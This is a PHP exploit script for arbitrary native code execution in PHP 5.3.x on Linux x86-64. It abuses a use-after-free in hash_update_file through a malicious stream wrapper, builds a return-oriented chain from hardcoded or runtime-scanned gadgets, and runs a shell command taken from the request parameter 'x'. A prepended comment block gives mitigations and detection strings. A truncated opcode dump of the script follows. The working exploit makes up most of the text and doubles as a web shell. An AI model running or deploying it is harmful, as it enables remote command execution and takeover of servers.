<?php
/*
 * BIPSAIDS.PHP -- by blasty <blasty@fail0verflow.com>
 *
 * PHP 5.3.x Linux x86-64 arbitrary code execution
 *
 * based on : MOPS-2010-001 (yes, bugs from 2010 live in <s>2011</s> 2012)
 *
 * NOTES:
 * Most distro's ship with PIE compiled httpd's these days, and everyone
 * seems to favour php5 as module rather than using php-cgi. This puts us
 * in an annoying position for doing Return-oriented-whatever.
 *
 * So the bad news is this exploit only works without restrictions against
 * machines that use php5-cgi and where gadgets have already been identified.
 *
 * However, the good news is if PHP doesn't enforce open_basedir restrictions
 * there's still a fat chance this exploit will succeed by parsing /proc/self/maps
 * to circumvent ASLR and identify gadgets during runtime by scanning libraries.
 *
 */
/*
 * REVIEW NOTES (defender's reading of the listing below)
 *
 * Listing state: the page shows the script collapsed onto a few physical
 * lines. The code below is left exactly as the page has it; only this
 * comment block and the line breaks in the header above are new.
 *
 * What the script is: a proof of concept that escalates "can run a PHP
 * script" to native command execution through a memory-safety bug in the
 * hash extension. The command string comes from $_REQUEST['x'] or, on the
 * CLI, $argv[1]. A copy of this file inside a web root therefore acts as a
 * web shell keyed on the request parameter "x".
 *
 * Structure, in source order:
 *  - ustruct($fmt, $data): walks a name => type map and unpacks u16 ('S'),
 *    u32 ('V') and u64 (two 'V' words recombined) fields from a binary string.
 *  - get_sections($filename): reads a file, decodes it as an ELF64 header
 *    plus section headers, and returns the sections whose flags have bit
 *    0x4 set (the executable-section flag), each with its name and raw bytes.
 *  - find_gadgets($gg, $data, $base): strpos() search for fixed byte
 *    patterns; returns name => $base + offset for each hit.
 *  - w64($v): packs an integer as two little-endian 32-bit words.
 *  - Address selection: when ORIG_SCRIPT_NAME or ORIG_SCRIPT_FILENAME
 *    contains "cgi", phpversion() is looked up in a table holding addresses
 *    for exactly three distro builds (5.3.2-1ubuntu4.10, 5.3.5-1ubuntu7.3,
 *    5.3.3-7+squeeze3). Otherwise, or when the version is not in the table,
 *    the script reads /proc/self/maps and scans every executable, file-backed
 *    mapping with get_sections()/find_gadgets().
 *  - class evil_stream: a userland stream wrapper. Its stream_read() calls
 *    hash_final() on the global hash context while hash_update_file() is
 *    still reading from the wrapper, then assigns a repeated 8-byte string
 *    to $GLOBALS['a'] and returns a crafted buffer. Presumably this is the
 *    already-freed hash context that MOPS-2010-001 describes -- confirm
 *    against the advisory.
 *  - Trigger: stream_wrapper_register("evil", ...), hash_init('md5'),
 *    hash_update_file($hid, "evil://code"). The final echo is only reached
 *    when hash_update_file() returns normally.
 *
 * Preconditions the author states (see NOTES above): either a php5-cgi
 * binary whose addresses are already in the table, or no open_basedir
 * enforcement so that /proc/self/maps and the mapped libraries are readable
 * from PHP. PHP loaded as a module inside a PIE httpd is called out as the
 * hard case.
 *
 * Mitigation:
 *  - Run a PHP release that contains the fix for the hash_update_file()
 *    issue; the 5.3.x line targeted here is long out of support.
 *  - Enforce open_basedir so scripts cannot read /proc/self/maps or system
 *    libraries. The author names this as what defeats the runtime fallback;
 *    it is hardening, not a fix for the underlying bug.
 *  - Where userland stream wrappers are not needed, consider listing
 *    stream_wrapper_register in disable_functions.
 *
 * Detection hooks taken from strings in this listing:
 *  - Script output: "gimme something to dance for", "plz2portgadgets:",
 *    "!!! ALL GADGETS FOUND, LETS-A-GO !!!", "setting <NAME> to 0x...",
 *    "looks like this tech isn't compatible with your box.", "oh snap :(",
 *    "you goofed up".
 *  - Source patterns: a stream wrapper registered under the scheme "evil",
 *    hash_update_file() on "evil://code", hash_final() called inside
 *    stream_read(), and file_get_contents("/proc/self/maps") from PHP.
 *  - The command buffer is prefixed with "WOOP ; " (and in one branch
 *    suffixed with " ; echo lol"); presumably that text shows up in
 *    process-execution or audit logs of the PHP worker -- verify in your
 *    own telemetry.
 *  - HTTP requests to a PHP file carrying a parameter named "x" whose value
 *    looks like a shell command.
 */
error_reporting(E_ALL); if (!isset($_REQUEST['x']) && !isset($argv[1])) die("gimme something to dance for\n"); $CMD = (isset($_REQUEST['x'])) ? $_REQUEST['x'] : $argv[1]; function ustruct($fmt, $data) { $out = array(); $pos = 0; $upack = array('u16'=>'S','u32'=>'V','u64'=>'V2'); $sizes = array('u16'=> 2 ,'u32'=> 4 ,'u64'=> 8 ); foreach($fmt as $name => $type) { $v = unpack($upack[$type], substr($data, $pos, $sizes[$type])); if ($type == 'u64') $v = ($v[2] << 32) | $v[1]; else $v = $v[1]; $out[$name] = $v; $pos += $sizes[$type]; } return $out; } function get_sections($filename) { $elf64_header = array( 'e_ident0' => 'u64', 'e_ident1' => 'u64', 'type' => 'u16', 'machine' => 'u16', 'version' => 'u32', 'entry' => 'u64', 'phoff' => 'u64', 'shoff' => 'u64', 'flags' => 'u32', 'ehsize' => 'u16', 'phentsize' => 'u16', 'phnum' => 'u16', 'shentsize' => 'u16', 'shnum' => 'u16', 'shstrndx' => 'u16' ); $elf64_sh = array( 'name' => 'u32', 'type' => 'u32', 'flags' => 'u64', 'addr' => 'u64', 'offset' => 'u64', 'size' => 'u64', 'link' => 'u32', 'info' => 'u32', 'align' => 'u64', 'entsize'=> 'u64' ); $buf = file_get_contents($filename); $hdr = ustruct($elf64_header, substr($buf, 0, 0x40)); 
echo "[>>] $filename\n"; $sections = array(); for($i = 0; $i < $hdr['shnum']; $i++) { $data = substr($buf, $hdr['shoff'] + ($i * $hdr['shentsize']), $hdr['shentsize']); $sections[] = ustruct($elf64_sh, $data); } $str_section = $sections[ $hdr['shstrndx'] ]; $ret_sections = array(); for($i = 0; $i < count($sections); $i++) { if (!($sections[$i]['flags']&4)) continue; $v = explode("\x00", substr($buf, $str_section['offset'] + $sections[$i]['name']) ); $sections[$i]['str'] = $v[0]; $sections[$i]['data'] = substr($buf, $sections[$i]['offset'], $sections[$i]['size']); $ret_sections[] = $sections[$i]; } return $ret_sections; } function find_gadgets($gg, $data, $base=0) { $ret = array(); foreach($gg as $name => $patterns) { if (!is_array($patterns)) $patterns = array($patterns); foreach($patterns as $pattern) { if (($pos = strpos($data, $pattern)) !== false) { $ret[$name] = $base+$pos; } } } return $ret; } function w64($v) { return pack("V", $v & 0xffffffff) . pack("V", $v >> 32); } $resolve = true; if ( ((isset($_SERVER['ORIG_SCRIPT_NAME']) && strstr($_SERVER['ORIG_SCRIPT_NAME'], "cgi") !== false) || (isset($_SERVER['ORIG_SCRIPT_FILENAME']) && strstr($_SERVER['ORIG_SCRIPT_FILENAME'], "cgi") !== false)) ) { $resolve = false; $cgirop = array( "5.3.2-1ubuntu4.10" => array(0x42c1b8, 0x42fd31, 0x42c59d, 0x65ca2b, 0x5f0758, 0x53c720, 0xd6a830, 0x096a20), "5.3.5-1ubuntu7.3" => array(0x429d4f, 0x42f3e1, 0x428c26, 0x50b22d, 0x5f0758, 0x6b1730, 0xdae7d0, 0x095260), "5.3.3-7+squeeze3" => array(0x42d478, 0x4310c1, 0x42d85d, 0x648bdb, 0x5dc538, 0x527600, 0xd5b810, 0x084970), //"5.3.8" /* ARCH */ => array(0x42544c, 0x4294ba, 0x42460b, 0x428f57, 0x427859, 0x423476, ); $v = phpversion(); if (!isset($cgirop[$v])) { echo "plz2portgadgets: ".$v."\nattempting fallback!\n"; $resolve = true; } else $addy = $cgirop[$v]; } if (!isset($addy)) { $patterns = array( 'ADDRSP' => "\x48\x83\xc4\x28\xc3", 'POPRAX' => "\x58\xc3", 'LEACALL' => array( "\x48\x8d\x7c\x24\x10\xff\xd0", 
"\x48\x8d\x7c\x24\x18\xff\xe0" ), 'SYSTEM' => "\x53\x48\x83\xec\x10\x48\x85\xff\x74\x16" ); $maps = explode("\n", file_get_contents("/proc/self/maps") ); $gadgets = array(); foreach($maps as $map) { $map = explode(" ", preg_replace('!\s+!', ' ', $map)); if (count($map)<2 || !strstr($map[1], "x") || $map[5][0] == '[') continue; if (count($patterns) == 1 && !strstr($map[5], "libc")) continue; $exec_sections = get_sections($map[5]); $tmp = explode("-", $map[0]); $page_offs = hexdec($tmp[0]); foreach($exec_sections as $section) { $new_gadgets = find_gadgets( $patterns, $section['data'], $section['offset'] ); foreach($new_gadgets as $name => $offs) { if (isset($patterns[$name])) { printf(" `- found gadget '%s' in [%s -> %s] @ 0x%x\n", $name, $map[5], $section['str'], $page_offs+$offs); unset($patterns[$name]); $new_gadgets[$name] += $page_offs; } } if (count($new_gadgets) > 0) $gadgets = array_merge($gadgets, $new_gadgets); if (count($patterns) == 0) { echo "!!! ALL GADGETS FOUND, LETS-A-GO !!!\n"; break 2; } } } $addy = $gadgets; } if (isset($gadgets)) { $ropvar = array('ADDRSP','POPRAX','LEACALL','SYSTEM'); for($i = 0; $i < count($ropvar); $i++) { printf("setting %s to 0x%x\n", $ropvar[$i], $addy[ $ropvar[$i] ]); $$ropvar[$i] = w64($addy[ $ropvar[$i] ]); } } else { $ropvar = array('ADDRSP','POPRAX','POPRDI','DEREFRAX','SUBRDIRAX','LEACALL','GOTENTRY','LIBCDELTA'); for($i = 0; $i < count($ropvar); $i++) { printf("setting %s to 0x%x\n", $ropvar[$i], $addy[ $i ]); $$ropvar[$i] = w64($addy[ $i ]); } } if (!isset($addy) || count($addy) != count($ropvar)) die("looks like this tech isn't compatible with your box.\n"); class evil_stream { function stream_open($a, $b, $c, &$e) { return 1; } function stream_eof() { return 0; } function stream_seek($offset, $whence) { return 0; } function stream_read($count) { global $ADDRSP, $POPRAX, $GOTENTRY, $DEREFRAX, $POPRDI, $LIBCDELTA, $SUBRDIRAX, $LEACALL, $CMD, $SYSTEM; hash_final($GLOBALS['hid'], false); $GLOBALS['a'] = 
str_repeat($ADDRSP, 3); // add 40, rsp if (isset($SYSTEM) && !empty($SYSTEM)) return $POPRAX . $SYSTEM . $LEACALL . str_repeat("Z", 0x58) . "WOOP ; " . $CMD . "\x00"; else return $POPRAX . $GOTENTRY . $DEREFRAX . $POPRDI . $LIBCDELTA . $SUBRDIRAX . $LEACALL . str_repeat("Z", 0x58) . "WOOP ; " . $CMD . " ; echo lol\x00"; } } stream_wrapper_register("evil", "evil_stream") || die("oh snap :(\n"); $hid = hash_init('md5'); hash_update_file($hid, "evil://code"); echo "you goofed up\n"; ?>
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 46) Position 1 = 7, Position 2 = 10
Branch analysis from position: 7
2 jumps found. (Code = 43) Position 1 = 11, Position 2 = 12
Branch analysis from position: 11
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 12
2 jumps found. (Code = 43) Position 1 = 15, Position 2 = 19
Branch analysis from position: 15
1 jumps found. (Code = 42) Position 1 = 21
Branch analysis from position: 21
2 jumps found. (Code = 46) Position 1 = 26, Position 2 = 34
Branch analysis from position: 26
2 jumps found. (Code = 47) Position 1 = 35, Position 2 = 47
Branch analysis from position: 35
2 jumps found. (Code = 46) Position 1 = 38, Position 2 = 46
Branch analysis from position: 38
2 jumps found. (Code = 43) Position 1 = 48, Position 2 = 63
Branch analysis from position: 48
2 jumps found. (Code = 43) Position 1 = 56, Position 2 = 61
Branch analysis from position: 56
1 jumps found. (Code = 42) Position 1 = 63
Branch analysis from position: 63
2 jumps found. (Code = 43) Position 1 = 66, Position 2 = 182
Branch analysis from position: 66
2 jumps found. (Code = 77) Position 1 = 77, Position 2 = 180
Branch analysis from position: 77
2 jumps found. (Code = 78) Position 1 = 78, Position 2 = 180
Branch analysis from position: 78
2 jumps found. (Code = 47) Position 1 = 91, Position 2 = 98
Branch analysis from position: 91
2 jumps found. (Code = 47) Position 1 = 99, Position 2 = 103
Branch analysis from position: 99
2 jumps found. (Code = 43) Position 1 = 104, Position 2 = 105
Branch analysis from position: 104
1 jumps found. (Code = 42) Position 1 = 77
Branch analysis from position: 77
Branch analysis from position: 105
2 jumps found. (Code = 46) Position 1 = 108, Position 2 = 115
Branch analysis from position: 108
2 jumps found. (Code = 43) Position 1 = 116, Position 2 = 117
Branch analysis from position: 116
1 jumps found. (Code = 42) Position 1 = 77
Branch analysis from position: 77
Branch analysis from position: 117
2 jumps found. (Code = 77) Position 1 = 134, Position 2 = 178
Branch analysis from position: 134
2 jumps found. (Code = 78) Position 1 = 135, Position 2 = 178
Branch analysis from position: 135
2 jumps found. (Code = 77) Position 1 = 144, Position 2 = 162
Branch analysis from position: 144
2 jumps found. (Code = 78) Position 1 = 145, Position 2 = 162
Branch analysis from position: 145
2 jumps found. (Code = 43) Position 1 = 148, Position 2 = 161
Branch analysis from position: 148
1 jumps found. (Code = 42) Position 1 = 144
Branch analysis from position: 144
Branch analysis from position: 161
Branch analysis from position: 162
2 jumps found. (Code = 43) Position 1 = 166, Position 2 = 171
Branch analysis from position: 166
2 jumps found. (Code = 43) Position 1 = 174, Position 2 = 177
Branch analysis from position: 174
1 jumps found. (Code = 42) Position 1 = 180
Branch analysis from position: 180
2 jumps found. (Code = 43) Position 1 = 184, Position 2 = 208
Branch analysis from position: 184
1 jumps found. (Code = 42) Position 1 = 204
Branch analysis from position: 204
2 jumps found. (Code = 44) Position 1 = 207, Position 2 = 187
Branch analysis from position: 207
1 jumps found. (Code = 42) Position 1 = 229
Branch analysis from position: 229
2 jumps found. (Code = 47) Position 1 = 232, Position 2 = 236
Branch analysis from position: 232
2 jumps found. (Code = 43) Position 1 = 237, Position 2 = 238
Branch analysis from position: 237
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 238
2 jumps found. (Code = 47) Position 1 = 243, Position 2 = 245
Branch analysis from position: 243
1 jumps found. (Code = 79) Position 1 = -2
Branch analysis from position: 245
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 236
Branch analysis from position: 187
2 jumps found. (Code = 44) Position 1 = 207, Position 2 = 187
Branch analysis from position: 207
Branch analysis from position: 187
Branch analysis from position: 208
1 jumps found. (Code = 42) Position 1 = 226
Branch analysis from position: 226
2 jumps found. (Code = 44) Position 1 = 229, Position 2 = 211
Branch analysis from position: 229
Branch analysis from position: 211
2 jumps found. (Code = 44) Position 1 = 229, Position 2 = 211
Branch analysis from position: 229
Branch analysis from position: 211
Branch analysis from position: 177
1 jumps found. (Code = 42) Position 1 = 134
Branch analysis from position: 134
Branch analysis from position: 171
Branch analysis from position: 162
Branch analysis from position: 178
1 jumps found. (Code = 42) Position 1 = 77
Branch analysis from position: 77
Branch analysis from position: 178
Branch analysis from position: 115
Branch analysis from position: 103
Branch analysis from position: 98
Branch analysis from position: 180
Branch analysis from position: 180
Branch analysis from position: 182
Branch analysis from position: 61
2 jumps found. (Code = 43) Position 1 = 66, Position 2 = 182
Branch analysis from position: 66
Branch analysis from position: 182
Branch analysis from position: 63
Branch analysis from position: 46
Branch analysis from position: 47
Branch analysis from position: 34
Branch analysis from position: 19
2 jumps found. (Code = 46) Position 1 = 26, Position 2 = 34
Branch analysis from position: 26
Branch analysis from position: 34
Branch analysis from position: 10
filename:       /in/Xtt4P
function name:  (null)
number of ops:  255
compiled vars:  !0 = $argv, !1 = $CMD, !2 = $resolve, !3 = $cgirop, !4 = $v, !5 = $addy, !6 = $patterns, !7 = $maps, !8 = $gadgets, !9 = $map, !10 = $exec_sections, !11 = $tmp, !12 = $page_offs, !13 = $section, !14 = $new_gadgets, !15 = $offs, !16 = $name, !17 = $ropvar, !18 = $i, !19 = $hid
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   22     0  E >   INIT_FCALL                                               'error_reporting'
          1        SEND_VAL                                                 32767
          2        DO_ICALL                                                 
   24     3        FETCH_IS                                         ~21     '_REQUEST'
          4        ISSET_ISEMPTY_DIM_OBJ                         0  ~22     ~21, 'x'
          5        BOOL_NOT                                         ~23     ~22
          6      > JMPZ_EX                                          ~23     ~23, ->10
          7    >   ISSET_ISEMPTY_DIM_OBJ                         0  ~24     !0, 1
          8        BOOL_NOT                                         ~25     ~24
          9        BOOL                                             ~23     ~25
         10    > > JMPZ                                                     ~23, ->12
   25    11    > > EXIT                                                     'gimme+something+to+dance+for%0A'
   27    12    >   FETCH_IS                                         ~26     '_REQUEST'
         13        ISSET_ISEMPTY_DIM_OBJ                         0          ~26, 'x'
         14      > JMPZ                                                     ~27, ->19
         15    >   FETCH_R                      global              ~28     '_REQUEST'
         16        FETCH_DIM_R                                      ~29     ~28, 'x'
         17        QM_ASSIGN                                        ~30     ~29
         18      > JMP                                                      ->21
         19    >   FETCH_DIM_R                                      ~31     !0, 1
         20        QM_ASSIGN                                        ~30     ~31
         21    >   ASSIGN                                                   !1, ~30
  110    22        ASSIGN                                                   !2, <true>
  113    23        FETCH_IS                                         ~34     '_SERVER'
         24        ISSET_ISEMPTY_DIM_OBJ                         0  ~35     ~34, 'ORIG_SCRIPT_NAME'
         25      > JMPZ_EX                                          ~35     ~35, ->34
         26    >   INIT_FCALL                                               'strstr'
         27        FETCH_R                      global              ~36     '_SERVER'
         28        FETCH_DIM_R                                      ~37     ~36, 'ORIG_SCRIPT_NAME'
         29        SEND_VAL                                                 ~37
         30        SEND_VAL                                                 'cgi'
         31        DO_ICALL                                         $38     
         32        TYPE_CHECK                                  1018  ~39     $38
         33        BOOL                                             ~35     ~39
         34    > > JMPNZ_EX                                         ~35     ~35, ->47
  114    35    >   FETCH_IS                                         ~40     '_SERVER'
         36        ISSET_ISEMPTY_DIM_OBJ                         0  ~41     ~40, 'ORIG_SCRIPT_FILENAME'
         37      > JMPZ_EX                                          ~41     ~41, ->46
         38    >   INIT_FCALL                                               'strstr'
         39        FETCH_R                      global              ~42     '_SERVER'
         40        FETCH_DIM_R                                      ~43     ~42, 'ORIG_SCRIPT_FILENAME'
         41        SEND_VAL                                                 ~43
         42        SEND_VAL                                                 'cgi'
         43        DO_ICALL                                         $44     
         44        TYPE_CHECK                                  1018  ~45     $44
         45        BOOL                                             ~41     ~45
         46    >   BOOL                                             ~35     ~41
         47    > > JMPZ                                                     ~35, ->63
  116    48    >   ASSIGN                                                   !2, <false>
  118    49        ASSIGN                                                   !3, <array>
  125    50        INIT_FCALL                                               'phpversion'
         51        DO_ICALL                                         $48     
         52        ASSIGN                                                   !4, $48
  126    53        ISSET_ISEMPTY_DIM_OBJ                         0  ~50     !3, !4
         54        BOOL_NOT                                         ~51     ~50
         55      > JMPZ                                                     ~51, ->61
  127    56    >   CONCAT                                           ~52     'plz2portgadgets%3A+', !4
         57        CONCAT                                           ~53     ~52, '%0Aattempting+fallback%21%0A'
         58        ECHO                                                     ~53
  128    59        ASSIGN                                                   !2, <true>
         60      > JMP                                                      ->63
  130    61    >   FETCH_DIM_R                                      ~55     !3, !4
         62        ASSIGN                                                   !5, ~55
  133    63    >   ISSET_ISEMPTY_CV                                 ~57     !5
         64        BOOL_NOT                                         ~58     ~57
         65      > JMPZ                                                     ~58, ->182
  134    66    >   ASSIGN                                                   !6, <array>
  144    67        INIT_FCALL                                               'explode'
         68        SEND_VAL                                                 '%0A'
  145    69        INIT_FCALL                                               'file_get_contents'
         70        SEND_VAL                                                 '%2Fproc%2Fself%2Fmaps'
         71        DO_ICALL                                         $60     
         72        SEND_VAR                                                 $60
         73        DO_ICALL                                         $61     
  144    74        ASSIGN                                                   !7, $61
  147    75        ASSIGN                                                   !8, <array>
  148    76      > FE_RESET_R                                       $64     !7, ->180
         77    > > FE_FETCH_R                                               $64, !9, ->180
  149    78    >   INIT_FCALL                                               'explode'
         79        SEND_VAL                                                 '+'
         80        INIT_FCALL                                               'preg_replace'
         81        SEND_VAL                                                 '%21%5Cs%2B%21'
         82        SEND_VAL                                                 '+'
         83        SEND_VAR                                                 !9
         84        DO_ICALL                                         $65     
         85        SEND_VAR                                                 $65
         86        DO_ICALL                                         $66     
         87        ASSIGN                                                   !9, $66
  150    88        COUNT                                            ~68     !9
         89        IS_SMALLER                                       ~69     ~68, 2
         90      > JMPNZ_EX                                         ~69     ~69, ->98
         91    >   INIT_FCALL                                               'strstr'
         92        FETCH_DIM_R                                      ~70     !9, 1
         93        SEND_VAL                                                 ~70
         94        SEND_VAL                                                 'x'
         95        DO_ICALL                                         $71     
         96        BOOL_NOT                                         ~72     $71
         97        BOOL                                             ~69     ~72
         98    > > JMPNZ_EX                                         ~69     ~69, ->103
         99    >   FETCH_DIM_R                                      ~73     !9, 5
        100        FETCH_DIM_R                                      ~74     ~73, 0
        101        IS_EQUAL                                         ~75     ~74, '%5B'
        102        BOOL                                             ~69     ~75
        103    > > JMPZ                                                     ~69, ->105
  151   104    > > JMP                                                      ->77
  152   105    >   COUNT                                            ~76     !6
        106        IS_EQUAL                                         ~77     ~76, 1
        107      > JMPZ_EX                                          ~77     ~77, ->115
        108    >   INIT_FCALL                                               'strstr'
        109        FETCH_DIM_R                                      ~78     !9, 5
        110        SEND_VAL                                                 ~78
        111        SEND_VAL                                                 'libc'
        112        DO_ICALL                                         $79     
        113        BOOL_NOT                                         ~80     $79
        114        BOOL                                             ~77     ~80
        115    > > JMPZ                                                     ~77, ->117
  153   116    > > JMP                                                      ->77
  154   117    >   INIT_FCALL                                               'get_sections'
        118        FETCH_DIM_R                                      ~81     !9, 5
        119        SEND_VAL                                                 ~81
        120        DO_FCALL                                      0  $82     
        121        ASSIGN                                                   !10, $82
  156   122        INIT_FCALL                                               'explode'
        123        SEND_VAL                                                 '-'
        124        FETCH_DIM_R                                      ~84     !9, 0
        125        SEND_VAL                                                 ~84
        126        DO_ICALL                                         $85     
        127        ASSIGN                                                   !11, $85
  157   128        INIT_FCALL                                               'hexdec'
        129        FETCH_DIM_R                                      ~87     !11, 0
        130        SEND_VAL                                                 ~87
        131        DO_ICALL                                         $88     
        132        ASSIGN                                                   !12, $88
  159   133      > FE_RESET_R                                       $90     !10, ->178
        134    > > FE_FETCH_R                                               $90, !13, ->178
  160   135    >   INIT_FCALL                                               'find_gadgets'
  161   136        SEND_VAR                                                 !6
        137        FETCH_DIM_R                                      ~91     !13, 'data'
        138        SEND_VAL                                                 ~91
        139        FETCH_DIM_R                                      ~92     !13, 'offset'
        140        SEND_VAL                                                 ~92
        141        DO_FCALL                                      0  $93     
  160   142        ASSIGN                                                   !14, $93
  163   143      > FE_RESET_R                                       $95     !14, ->162
        144    > > FE_FETCH_R                                       ~96     $95, !15, ->162
        145    >   ASSIGN                                                   !16, ~96
  164   146        ISSET_ISEMPTY_DIM_OBJ                         0          !6, !16
        147      > JMPZ                                                     ~98, ->161
  165   148    >   INIT_FCALL                                               'printf'
        149        SEND_VAL                                                 '++%60-+found+gadget+%27%25s%27+in+%5B%25s+-%3E+%25s%5D+%40+0x%25x%0A'
        150        SEND_VAR                                                 !16
        151        FETCH_DIM_R                                      ~99     !9, 5
        152        SEND_VAL                                                 ~99
        153        FETCH_DIM_R                                      ~100    !13, 'str'
        154        SEND_VAL                                                 ~100
        155        ADD                                              ~101    !12, !15
        156        SEND_VAL                                                 ~101
        157        DO_ICALL                                                 
  166   158        UNSET_DIM                                                !6, !16
  167   159        ASSIGN_DIM_OP                +=               1          !14, !16
        160        OP_DATA                                                  !12
  163   161    > > JMP                                                      ->144
        162    >   FE_FREE                                                  $95
  170   163        COUNT                                            ~104    !14
        164        IS_SMALLER                                               0, ~104
        165      > JMPZ                                                     ~105, ->171
  171   166    >   INIT_FCALL                                               'array_merge'
        167        SEND_VAR                                                 !8
        168        SEND_VAR                                                 !14
        169        DO_ICALL                                         $106    
        170        ASSIGN                                                   !8, $106
  172   171    >   COUNT                                            ~108    !6
        172        IS_EQUAL                                                 ~108, 0
        173      > JMPZ                                                     ~109, ->177
  173   174    >   ECHO                                                     '%21%21%21+ALL+GADGETS+FOUND%2C+LETS-A-GO+%21%21%21%0A'
  174   175        FE_FREE                                                  $90
        176      > JMP                                                      ->180
  159   177    > > JMP                                                      ->134
        178    >   FE_FREE                                                  $90
  148   179      > JMP                                                      ->77
        180    >   FE_FREE                                                  $64
  178   181        ASSIGN                                                   !5, !8
  180   182    >   ISSET_ISEMPTY_CV                                         !8
        183      > JMPZ                                                     ~111, ->208
  181   184    >   ASSIGN                                                   !17, <array>
  182   185        ASSIGN                                                   !18, 0
        186      > JMP                                                      ->204
  183   187    >   INIT_FCALL                                               'printf'
        188        SEND_VAL                                                 'setting+%25s+to+0x%25x%0A'
        189        FETCH_DIM_R                                      ~114    !17, !18
        190        SEND_VAL                                                 ~114
        191        FETCH_DIM_R                                      ~115    !17, !18
        192        FETCH_DIM_R                                      ~116    !5, ~115
        193        SEND_VAL                                                 ~116
        194        DO_ICALL                                                 
  184   195        INIT_FCALL                                               'w64'
        196        FETCH_DIM_R                                      ~120    !17, !18
        197        FETCH_DIM_R                                      ~121    !5, ~120
        198        SEND_VAL                                                 ~121
        199        DO_FCALL                                      0  $122    
        200        FETCH_W                      local               $118    !17
        201        ASSIGN_DIM                                               $118, !18
        202        OP_DATA                                                  $122
  182   203        PRE_INC                                                  !18
        204    >   COUNT                                            ~124    !17
        205        IS_SMALLER                                               !18, ~124
        206      > JMPNZ                                                    ~125, ->187
        207    > > JMP                                                      ->229
  187   208    >   ASSIGN                                                   !17, <array>
  189   209        ASSIGN                                                   !18, 0
        210      > JMP                                                      ->226
  190   211    >   INIT_FCALL                                               'printf'
        212        SEND_VAL                                                 'setting+%25s+to+0x%25x%0A'
        213        FETCH_DIM_R                                      ~128    !17, !18
        214        SEND_VAL                                                 ~128
        215        FETCH_DIM_R                                      ~129    !5, !18
        216        SEND_VAL                                                 ~129
        217        DO_ICALL                                                 
  191   218        INIT_FCALL                                               'w64'
        219        FETCH_DIM_R                                      ~133    !5, !18
        220        SEND_VAL                                                 ~133
        221        DO_FCALL                                      0  $134    
        222        FETCH_W                      local               $131    !17
        223        ASSIGN_DIM                                               $131, !18
        224        OP_DATA                                                  $134
  189   225        PRE_INC                                                  !18
        226    >   COUNT                                            ~136    !17
        227        IS_SMALLER                                               !18, ~136
        228      > JMPNZ                                                    ~137, ->211
  195   229    >   ISSET_ISEMPTY_CV                                 ~138    !5
        230        BOOL_NOT                                         ~139    ~138
        231      > JMPNZ_EX                                         ~139    ~139, ->236
        232    >   COUNT                                            ~140    !5
        233        COUNT                                            ~141    !17
        234        IS_NOT_EQUAL                                     ~142    ~140, ~141
        235        BOOL                                             ~139    ~142
        236    > > JMPZ                                                     ~139, ->238
  196   237    > > EXIT                                                     'looks+like+this+tech+isn%27t+compatible+with+your+box.%0A'
  225   238    >   INIT_FCALL                                               'stream_wrapper_register'
        239        SEND_VAL                                                 'evil'
        240        SEND_VAL                                                 'evil_stream'
        241        DO_ICALL                                         $143    
        242      > JMPNZ_EX                                         ~144    $143, ->245
        243    > > EXIT                                                     'oh+snap+%3A%28%0A'
        244*       BOOL                                             ~144    <true>
  226   245    >   INIT_FCALL                                               'hash_init'
        246        SEND_VAL                                                 'md5'
        247        DO_ICALL                                         $145    
        248        ASSIGN                                                   !19, $145
  227   249        INIT_FCALL                                               'hash_update_file'
        250        SEND_VAR                                                 !19
        251        SEND_VAL                                                 'evil%3A%2F%2Fcode'
        252        DO_ICALL                                                 
  228   253        ECHO                                                     'you+goofed+up%0A'
  229   254      > RETURN                                                   1

Function ustruct:
Finding entry points
Branch analysis from position: 0
2 jumps found. (Code = 77) Position 1 = 7, Position 2 = 36
Branch analysis from position: 7
2 jumps found. (Code = 78) Position 1 = 8, Position 2 = 36
Branch analysis from position: 8
2 jumps found. (Code = 43) Position 1 = 23, Position 2 = 29
Branch analysis from position: 23
1 jumps found. (Code = 42) Position 1 = 31
Branch analysis from position: 31
1 jumps found. (Code = 42) Position 1 = 7
Branch analysis from position: 7
Branch analysis from position: 29
1 jumps found. (Code = 42) Position 1 = 7
Branch analysis from position: 7
Branch analysis from position: 36
1 jumps found. (Code = 62) Position 1 = -2
Branch analysis from position: 36
filename:       /in/Xtt4P
function name:  ustruct
number of ops:  39
compiled vars:  !0 = $fmt, !1 = $data, !2 = $out, !3 = $pos, !4 = $upack, !5 = $sizes, !6 = $type, !7 = $name, !8 = $v
line      #* E I O op                           fetch          ext  return  operands
-------------------------------------------------------------------------------------
   29     0  E >   RECV                                             !0      
          1        RECV                                             !1      
   30     2        ASSIGN                                                   !2, <array>
   31     3        ASSIGN                                                   !3, 0
   32     4        ASSIGN                                                   !4, <array>
   33     5        ASSIGN                                                   !5, <array>
   35     6      > FE_RESET_R                                       $13     !0, ->36
          7    > > FE_FETCH_R                                       ~14     $13, !6, ->36
          8    >   ASSIGN                                                   !7, ~14
   36     9        INIT_FCALL                                               'unpack'
         10        FETCH_DIM_R                                      ~16     !4, !6
         11        SEND_VAL                                                 ~16
         12        INIT_FCALL                                               'substr'
         13        SEND_VAR                                                 !1
         14        SEND_VAR                                                 !3
         15        FETCH_DIM_R                                      ~17     !5, !6
         16        SEND_VAL                                                 ~17
         17        DO_ICALL                                         $18     
         18        SEND_VAR                                                 $18
         19        DO_ICALL                                         $19     
         20        ASSIGN                                                   !8, $19
   37    21        IS_EQUAL                                                 !6, 'u64'
         22      > JMPZ                                                     ~21, ->29
   38    23    >   FETCH_DIM_R                                      ~22     !8, 2
         24        SL                                               ~23     ~22, 32
         25        FETCH_DIM_R                                      ~24     !8, 1
         26        BW_OR                                            ~25     ~23, ~24
         27        ASSIGN                                                   !8, ~25
         28      > JMP                                                      ->31
   40    29    >   FETCH_DIM_R                                      ~27     !8, 1
         30        ASSIGN                                                   !8, ~27
   41    31    >   ASSIGN_DIM                                               !2, !7
         32        OP_DATA                                                  !8
   42    33        FETCH_DIM_R                                      ~30     !5, !6
         34        ASSIGN_OP                                     1          !3, ~30
   35    35      > JMP                                                      ->7
         36    >   FE_FREE                                                  $13
   44    37      > RETURN                                                   !2
   45    38*     > RETURN                                                   null

End of function ustruct

Function get_sections:
Finding entry points
Branch analysis from position: 0
1 jumps found. (Code = 42) Position 1 = 42
Branch analysis from position: 42
2 jumps found. (Code = 44) Position 1 = 45, Position 2 = 24
Branch analysis from position: 45
1 jumps found. (Code = 42) Position 1 = 90
